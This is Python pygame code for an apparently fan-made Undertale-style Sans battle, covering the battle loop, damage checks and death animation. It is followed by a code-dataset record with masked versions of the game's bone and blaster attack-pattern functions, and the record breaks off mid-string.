if player.choose:
page = list(mc_actions.values())[player.choice]
player.choose = False
player.choice = 0
if player.back:
page = MERCY
if page == MERCY_SANS_SPARE: # 你都饶恕了,想必也不想继续玩了()
exit()
if page == MERCY_SANS_FLEE: # 你都逃跑了,想必也不想继续玩了()
exit()
# 你死了
if player.HP + player.KR <= 0:
DEAD = True
if DEAD or restarting:
break
# 判定伤害
blue_mask = pygame.mask.from_surface(mask_surface_blue)
orange_mask = pygame.mask.from_surface(mask_surface_orange)
normal_mask = pygame.mask.from_surface(mask_surface_normal)
if mask_collide(blue_mask, player.mask, [0, 0], player.mask_pos):
if any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):
damage(player)
if mask_collide(orange_mask, player.mask, [0, 0], player.mask_pos):
if not any([player.going_up, player.going_down, player.going_left, player.going_right, player.falling]):
damage(player)
if mask_collide(normal_mask, player.mask, [0, 0], player.mask_pos):
damage(player)
# 玩家
player.show(screen, _boxpos, _boxsize)
# 黑屏攻击
if blackout:
screen.fill(0x000000)
"""将screen的图像加工后放入display"""
if not FULL_SCREEN:
rotated_screen = pygame.transform.rotate(screen, screen_angle)
else:
screen_rect = screen.get_rect()
rotated_screen = pygame.transform.rotate(
pygame.transform.scale(
screen,
(
round(screen_rect.size[1] / screen_rect.size[0] * 1920),
1080
)
),
screen_angle
)
rotated_rect = rotated_screen.get_rect()
if not FULL_SCREEN:
rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]
else:
rotated_rect.center = [960, 540]
display.blit(rotated_screen,
(rotated_rect.x + screen_offset[0],
rotated_rect.y + screen_offset[1]))
fps.tick(frames)
pygame.display.update()
time2 = time_.time()
delta = time2 - time1
# --- death sequence: runs only after the battle loop above has been exited,
#     and only when the exit was a death rather than a restart ---
if not restarting:
ticks = 0
heart_offset = [0, 0]   # jitter offset for the broken-heart phase
while True:
'''死后的'''
# 200-tick post-death animation; phases are keyed off the tick counter below.
pygame.mixer.music.stop()
ticks += 1
screen.fill((0, 0, 0, 255))
if ticks >= 200:
break
if ticks >= 160:
# final phase: draw alive_img (presumably the intact heart) again
screen.blit(alive_img, player.rect)
if ticks == 160:
split_sound.play()
elif ticks >= 100:
# dead_img (presumably the broken heart) jitters around its position
screen.blit(dead_img,
(player.rect.x + heart_offset[0],
player.rect.y + heart_offset[1]))
heart_offset = [random.randint(-2, 2), random.randint(-2, 2)]
elif ticks >= 60:
# heart breaks; split sound plays exactly once, on tick 60
screen.blit(dead_img, player.rect)
if ticks == 60:
split_sound.play()
else:
# ticks 1-59: heart still intact
screen.blit(alive_img, player.rect)
# Same screen -> display post-processing as the battle loop uses
# (rotate; in fullscreen also scale to 1080-pixel height, keeping aspect).
if not FULL_SCREEN:
rotated_screen = pygame.transform.rotate(screen, screen_angle)
else:
screen_rect = screen.get_rect()
rotated_screen = pygame.transform.rotate(
pygame.transform.scale(
screen,
(
round(screen_rect.size[1] / screen_rect.size[0] * 1920),
1080
)
),
screen_angle
)
rotated_rect = rotated_screen.get_rect()
if not FULL_SCREEN:
rotated_rect.center = [SCREEN_SIZE[0] // 2, SCREEN_SIZE[1] // 2]
else:
rotated_rect.center = [960, 540]
display.blit(rotated_screen,
(rotated_rect.x + screen_offset[0],
rotated_rect.y + screen_offset[1]))
fps.tick(frames)
pygame.display.update()
|
normal
|
{
"blob_id": "46fd4b976526a1bc70cf902bdb191feea8b84ad9",
"index": 2633,
"step-1": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n<mask token>\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n 
player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, 
time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n 
BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7], speed=[0, \n -5], direction=UP, time1=8, time2=40, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 0], direction=UP, time1=200, time2=48, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 5], direction=UP, time1=8, time2=248, length=1000, type_=1))\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], 
speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n 
global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, 
time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1] + BOX_SIZE[1]], angle\n =0, time1=10, time2=70, time3=10, width=70))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1]], angle=0, time1=10,\n time2=70, time3=10, width=30))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30], length=\n 1000, direction=UP, time1=1000, time2=100, speed=[0, 0], type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] - 8], length=5, direction=DOWN,\n time1=1000, time2=100, speed=[0, 0], type_=2))\n boards.append(Board(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40, speed=[1, 0], time1=BOX_SIZE[0], time2=100, direction=UP))\n for _ in range(0, 20, 4):\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] +\n BOX_SIZE[1] - 40 - 25], length=1000, direction=UP, time1=\n BOX_SIZE[0] // 4, time2=150 + _ * 30, speed=[-4, 0]))\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen: 
set_screen_angle(0), 682))\n\n\n<mask token>\n\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say('好了,我也累了,不如我们休息一下?')\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\n@add_attack\ndef before_flash():\n sans.say('好吧,看来你已经做出了自己的选择。')\n\n\n<mask token>\n\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = 
RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + 50], angle=0, time1\n =10, time2=70, time3=0, width=100))\n\n\ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] 
+ BOX_SIZE[1] - 50],\n angle=0, time1=10, time2=70, time3=0, width=100))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7], speed=[0, \n -5], direction=UP, time1=8, time2=40, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 0], direction=UP, time1=200, time2=48, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 5], direction=UP, time1=8, time2=248, length=1000, type_=1))\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], 
